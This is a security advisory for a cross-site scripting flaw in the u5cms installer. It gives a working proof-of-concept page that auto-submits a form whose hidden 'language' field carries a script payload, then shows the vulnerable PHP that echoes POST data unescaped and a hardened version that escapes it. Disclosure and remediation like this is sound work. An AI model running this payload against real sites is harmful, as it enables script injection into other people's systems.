|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|=============================================================|
|[+] Exploit Title: u5cmszip_en Cms Cross Site Scripting
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Vendor Homepage: http://yuba.ch/
|[+]
|[+] Download Link : http://yuba.ch/f.php?f=r/u5cmszip/u5cmszip_en.zip?t=1479045196
|[+]
|[+] Tested on: Kali Linux
|[+]
|[+] Date: 12/27/2016
|=============================================================|
|[+] Exploit Code:
<html>
<head><title>Cross Site Scripting</title></head>
<body>
<form action="http://127.0.0.1/3/CMS/install/start.php" method="post" name="installation_step0">
<select name="language" class="language">
<option value="de">deutsch</option>
<option value="en" selected="selected">english</option>
<option value="es">spanish</option>
</select>
<!-- Second "language" field: PHP keeps the last value of a duplicated key, so this hidden input overrides the <select>.
     The double quote in the payload is written as &quot; so the attribute itself stays well-formed. -->
<input type="hidden" name="language" id="language" value="en'&quot;()&%<acx><ScRiPt>alert(123)</ScRiPt>" />
</form>
<script type="text/javascript">
// Auto-submit the form named installation_step0 (the original called .submit() on a URL string, which is not valid JavaScript).
setTimeout(function () { document.forms['installation_step0'].submit(); }, 1);
</script>
</body>
</html>
============================================================
Vulnerable code:
<form action="step1.php" method="post" name="installation_step0">
<h4>Please choose a language | Bitte wählen Sie eine Sprache | Porfavor eligé una idioma:</h4>
<select name="language" class="language">
<?php
$countries = shortTag_countries();
foreach ($countries as $country => $iso) {
    // Option labels are passed through htmlentities(); the selection list itself is not the problem.
    print "<option value=\"{$iso}\"" . (strtolower($iso) == $http_lang ? 'selected="selected"' : '') . ">"
        . htmlentities($country) . "</option>\n";
}
?>
</select>
<?php foreach ($_POST as $key => $value) { ?>
<?php if (!strpos($key, 'password')) { ?>
<?php // $key and $value come straight from the POST body and are echoed into the attribute without any escaping: this is the XSS. ?>
<input type="hidden" name="<?php echo $key ?>" id="<?php echo $key ?>" value="<?php echo $value ?>" />
<?php } } ?>
<input type="image" src="button_next.gif" alt="next" title="Next step" align="right" border="0" />
</form>
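A hardened replacement for the hidden-field loop above, added here as an example and not taken from the vendor's code. It assumes the same `$_POST` carry-over is wanted; the function name `render_hidden_fields` and the sample input are constructed for illustration.

```php
<?php
// Added example (not u5cms code): re-emit POSTed fields as hidden inputs with
// every key and value HTML-escaped, so quotes, angle brackets and ampersands
// in the input (the advisory's payload included) become inert attribute text.
function render_hidden_fields(array $post): string
{
    $html = '';
    foreach ($post as $key => $value) {
        // The original test !strpos($key, 'password') is true when the needle
        // sits at offset 0 (strpos returns 0), so compare against false instead.
        if (strpos((string)$key, 'password') !== false) {
            continue;
        }
        // Non-scalar entries (nested arrays) cannot be carried in one hidden field; drop them.
        if (!is_scalar($value)) {
            continue;
        }
        // Escape the key as well as the value: both are attacker-controlled.
        $k = htmlspecialchars((string)$key, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
        $v = htmlspecialchars((string)$value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
        $html .= '<input type="hidden" name="' . $k . '" id="' . $k . '" value="' . $v . '" />' . "\n";
    }
    return $html;
}

// Constructed sample input mirroring the advisory's "language" field plus a
// password field that must not be re-emitted.
$sample = [
    'language'    => 'en\'"()&%<acx><ScRiPt>alert(123)</ScRiPt>',
    'db_password' => 'secret',
];
echo render_hidden_fields($sample);
```

With this in place the `<ScRiPt>` tag and the closing quote in the sample arrive in the page as `&lt;ScRiPt&gt;` and `&quot;`, so the attribute is never broken out of and no script runs.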
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By: M.R.S.L.Y
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|